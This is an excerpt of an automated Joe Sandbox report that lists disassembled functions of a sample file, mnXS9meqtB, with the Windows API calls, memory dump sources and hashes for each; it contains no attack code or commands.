                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003430A5,?,00000001), ref: 003440AE
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003430A5,?,00000001), ref: 003440F3
                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003430A5,?,00000001), ref: 00344108
                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003430A5,?,00000001), ref: 00344113
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: 08041e3de564a4229d138b88bd3e0728c620b5dcc11c55ad614397b713e64eb3
                                                                            • Instruction ID: 522b05a00cd529ce32f5eb9455e94ff48fc2af5eda831d2bed50951177a6ee1c
                                                                            • Opcode Fuzzy Hash: 08041e3de564a4229d138b88bd3e0728c620b5dcc11c55ad614397b713e64eb3
                                                                            • Instruction Fuzzy Hash: 1B314D71500204ABDB13EF54DC89FAD77EEAB68351F12C125F905EA294DBB4BA808B64
                                                                            Function 00303093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003030DC
                                                                            • CoUninitialize.OLE32(?,00000000), ref: 00303181
                                                                            • UnregisterHotKey.USER32(?), ref: 003032A9
                                                                            • DestroyWindow.USER32(?), ref: 00375079
                                                                            • FreeLibrary.KERNEL32(?), ref: 003750F8
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00375125
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: 2bd429b115110d5fc5790bc9aa74355dfcf8bfc63e2577e3b9be7e9a13e587a5
                                                                            • Instruction ID: 162a353c9ac35b12880d0960cd5e73b838a964a263221944e51eb219c6540406
                                                                            • Opcode Fuzzy Hash: 2bd429b115110d5fc5790bc9aa74355dfcf8bfc63e2577e3b9be7e9a13e587a5
                                                                            • Instruction Fuzzy Hash: 3E914174612202CFC71BEF14C8A5B68F3A8FF05304F5581A9E50A6B2A2DF74AE56CF44
                                                                            Function 0031CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 0031CC15
                                                                              • Part of subcall function 0031CCCD: GetClientRect.USER32(?,?), ref: 0031CCF6
                                                                              • Part of subcall function 0031CCCD: GetWindowRect.USER32(?,?), ref: 0031CD37
                                                                              • Part of subcall function 0031CCCD: ScreenToClient.USER32(?,?), ref: 0031CD5F
                                                                            • GetDC.USER32 ref: 0037D137
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0037D14A
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0037D158
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0037D16D
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0037D175
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0037D200
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: e4762bbb3d7a7893d4999527f97f0801e5b76bcb4e36c24d1649efa030b73baa
                                                                            • Instruction ID: e97bf4e67e933af0c97f279c99f5a7d95ae60fca15bc3072f0f0f279a16f3996
                                                                            • Opcode Fuzzy Hash: e4762bbb3d7a7893d4999527f97f0801e5b76bcb4e36c24d1649efa030b73baa
                                                                            • Instruction Fuzzy Hash: 8171FF30400209DFCF378F64C881AEA7BB9FF49314F158669ED599A2A6C7359C92DF60
                                                                            Function 0036ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                              • Part of subcall function 0031B63C: GetCursorPos.USER32(000000FF), ref: 0031B64F
                                                                              • Part of subcall function 0031B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0031B66C
                                                                              • Part of subcall function 0031B63C: GetAsyncKeyState.USER32(00000001), ref: 0031B691
                                                                              • Part of subcall function 0031B63C: GetAsyncKeyState.USER32(00000002), ref: 0031B69F
                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0036ED3C
                                                                            • ImageList_EndDrag.COMCTL32 ref: 0036ED42
                                                                            • ReleaseCapture.USER32 ref: 0036ED48
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0036EDF0
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0036EE03
                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0036EEDC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                            • API String ID: 1924731296-2107944366
                                                                            • Opcode ID: 32be91094e63a5efb1af1bd09d5e1319f8ae8e19b0ac68cd1cc0b7980b0d0933
                                                                            • Instruction ID: 23d78991ce723517989297a2b2481752cdd5ae28e5ac28982c0f5831c77ea998
                                                                            • Opcode Fuzzy Hash: 32be91094e63a5efb1af1bd09d5e1319f8ae8e19b0ac68cd1cc0b7980b0d0933
                                                                            • Instruction Fuzzy Hash: A251DF74204304AFD706EF20DC56FAA77E8FB88704F004A1DF9559B2E2DB71A928CB52
                                                                            Function 003545C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003545FF
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0035462B
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0035466D
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00354682
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0035468F
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003546BF
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00354706
                                                                              • Part of subcall function 00355052: GetLastError.KERNEL32(?,?,003543CC,00000000,00000000,00000001), ref: 00355067
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 1241431887-3916222277
                                                                            • Opcode ID: a5bdc4e01f7fd7a5be5ff59baf564eb8e2894f2a79cfeafafc7f52562a2cbd1e
                                                                            • Instruction ID: ace5af6e85cd68ac7c5679f8e0921d73290ae22dda46b56555b6f593c960f251
                                                                            • Opcode Fuzzy Hash: a5bdc4e01f7fd7a5be5ff59baf564eb8e2894f2a79cfeafafc7f52562a2cbd1e
                                                                            • Instruction Fuzzy Hash: 10417CB1501209BFEB079F50CC89FBB77ACFF09319F004056FE059A1A5E7B099888BA4
                                                                            Function 0035B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0039DC00), ref: 0035B715
                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0039DC00), ref: 0035B749
                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0035B8C1
                                                                            • SysFreeString.OLEAUT32(?), ref: 0035B8EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                            • String ID:
                                                                            • API String ID: 560350794-0
                                                                            • Opcode ID: 68f6201417da94d65437998e16621179c5bfd27e2586045036f90369662fcbc8
                                                                            • Instruction ID: ca7668f4fe67075baf001552fece982244964b4bd701e8410c3b0c44abfb8cd7
                                                                            • Opcode Fuzzy Hash: 68f6201417da94d65437998e16621179c5bfd27e2586045036f90369662fcbc8
                                                                            • Instruction Fuzzy Hash: BDF14E75A00209EFCF05DF94C884EAEB7B9FF49315F118599F905AB260DB31AE45CB50
                                                                            Function 003624D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 003624F5
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00362688
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003626AC
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003626EC
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0036270E
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0036286F
                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003628A1
                                                                            • CloseHandle.KERNEL32(?), ref: 003628D0
                                                                            • CloseHandle.KERNEL32(?), ref: 00362947
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                            • String ID:
                                                                            • API String ID: 4090791747-0
                                                                            • Opcode ID: edb673f165d4543499c6c33b1db43b01a4c742f86b69c4a0c72d315591533d75
                                                                            • Instruction ID: 481f31c5e73c791a2850070c5fbd0663854717cc95dd386020b1d2228362881a
                                                                            • Opcode Fuzzy Hash: edb673f165d4543499c6c33b1db43b01a4c742f86b69c4a0c72d315591533d75
                                                                            • Instruction Fuzzy Hash: 7ED1AF35604700DFCB16EF24C891A6ABBE5AF89310F15C95DF9899F2A2DB31EC44CB52
                                                                            Function 0036B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0036B3F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: add9b5dd36ec4357be1fb825b719d5f63a6e88c6765d176e5832cf0c3fef32aa
                                                                            • Instruction ID: 2335611827120bf0d8e680682a7b8dc2d984d4bec168898322c4c8e2de50d49c
                                                                            • Opcode Fuzzy Hash: add9b5dd36ec4357be1fb825b719d5f63a6e88c6765d176e5832cf0c3fef32aa
                                                                            • Instruction Fuzzy Hash: 6551C335600204BBEF279F29CC85FADBB68AB05314F648011F655DA6E6DB71E9D0CF50
                                                                            Function 0031A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0037DB1B
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0037DB3C
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0037DB51
                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0037DB6E
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0037DB95
                                                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0031A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0037DBA0
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0037DBBD
                                                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0031A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0037DBC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                            • String ID:
                                                                            • API String ID: 1268354404-0
                                                                            • Opcode ID: c800bcd18a34bd35be9d4ecfe9c33748ca9bbd352c80a0f5521a521373d97fb1
                                                                            • Instruction ID: 55905dc56b802d4d3cd8fb7c91a8c699ed682e7c79ad342ebc8cda10fd8f8197
                                                                            • Opcode Fuzzy Hash: c800bcd18a34bd35be9d4ecfe9c33748ca9bbd352c80a0f5521a521373d97fb1
                                                                            • Instruction Fuzzy Hash: D9518870600708EFDB26DF68CC81FAA77B9AF08350F114519F94AAB6D1D7B4AD90DB50
                                                                            Function 00347555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00345FA6,?), ref: 00346ED8
                                                                              • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00345FA6,?), ref: 00346EF1
                                                                              • Part of subcall function 003472CB: GetFileAttributesW.KERNEL32(?,00346019), ref: 003472CC
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 003475CA
                                                                            • _wcscmp.LIBCMT ref: 003475E2
                                                                            • MoveFileW.KERNEL32(?,?), ref: 003475FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 793581249-0
                                                                            • Opcode ID: cf1bdeedbd01db3a4be8675518e1b8595f8fe01a1d10d4332ca9f2180516e562
                                                                            • Instruction ID: f003bf0cc98e81fedd47717a129c31ee130bf0c8e857b78096578f26bfb57e34
                                                                            • Opcode Fuzzy Hash: cf1bdeedbd01db3a4be8675518e1b8595f8fe01a1d10d4332ca9f2180516e562
                                                                            • Instruction Fuzzy Hash: 1E5131B29092295ADF56EB54D8419DE73FC9F08310B0044EAF605EB441DB74A6C9CF60
                                                                            Function 0031EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0037DAD1,00000004,00000000,00000000), ref: 0031EAEB
                                                                            • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0037DAD1,00000004,00000000,00000000), ref: 0031EB32
                                                                            • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0037DAD1,00000004,00000000,00000000), ref: 0037DC86
                                                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0037DAD1,00000004,00000000,00000000), ref: 0037DCF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: 8dd31ca22b49ed3343ff80b3cfc148abd39944080839853df1d6bd26ff7e4d3e
                                                                            • Instruction ID: 959a689e22c12023c31b40275c97cb9767ad33479c71882a6528825149ea15c6
                                                                            • Opcode Fuzzy Hash: 8dd31ca22b49ed3343ff80b3cfc148abd39944080839853df1d6bd26ff7e4d3e
                                                                            • Instruction Fuzzy Hash: 9B410C7120D3819AD73F4B288D8DBB67BADAF49311F1A840DF84B869A1D676B8C0D311
                                                                            Function 0033B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0033AEF1,00000B00,?,?), ref: 0033B26C
                                                                            • HeapAlloc.KERNEL32(00000000,?,0033AEF1,00000B00,?,?), ref: 0033B273
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0033AEF1,00000B00,?,?), ref: 0033B288
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,0033AEF1,00000B00,?,?), ref: 0033B290
                                                                            • DuplicateHandle.KERNEL32(00000000,?,0033AEF1,00000B00,?,?), ref: 0033B293
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0033AEF1,00000B00,?,?), ref: 0033B2A3
                                                                            • GetCurrentProcess.KERNEL32(0033AEF1,00000000,?,0033AEF1,00000B00,?,?), ref: 0033B2AB
                                                                            • DuplicateHandle.KERNEL32(00000000,?,0033AEF1,00000B00,?,?), ref: 0033B2AE
                                                                            • CreateThread.KERNEL32(00000000,00000000,0033B2D4,00000000,00000000,00000000), ref: 0033B2C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: 08f914e19d326e3ee7a8c2a8c26cad5fcab51b98d509b7fe9f11d6c3136f576f
                                                                            • Instruction ID: b8bd5536ce58725a01a180794607e393960f89acca45326dfd7319ab6cd08447
                                                                            • Opcode Fuzzy Hash: 08f914e19d326e3ee7a8c2a8c26cad5fcab51b98d509b7fe9f11d6c3136f576f
                                                                            • Instruction Fuzzy Hash: A201C9B5240308BFE711AFA5EC8DF6B7BACEB88711F058451FA05DB1E1CAB49800CB61
                                                                            Function 0035C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 69f36229ca305996e29bf0eb3586c49f63a5a9748b5daafda59771946ffaa6fb
                                                                            • Instruction ID: 5f47ec37a7cad2dcaf191490603fc1ed356748c5066462f02d94f5fbdea237b2
                                                                            • Opcode Fuzzy Hash: 69f36229ca305996e29bf0eb3586c49f63a5a9748b5daafda59771946ffaa6fb
                                                                            • Instruction Fuzzy Hash: 4FE1E371A10319AFCF16DFA4C881EEE77B9EF48319F155029ED05AB291E770AD48CB90
                                                                            Function 003516DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                              • Part of subcall function 0031C6F4: _wcscpy.LIBCMT ref: 0031C717
                                                                            • _wcstok.LIBCMT ref: 0035184E
                                                                            • _wcscpy.LIBCMT ref: 003518DD
                                                                            • _memset.LIBCMT ref: 00351910
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
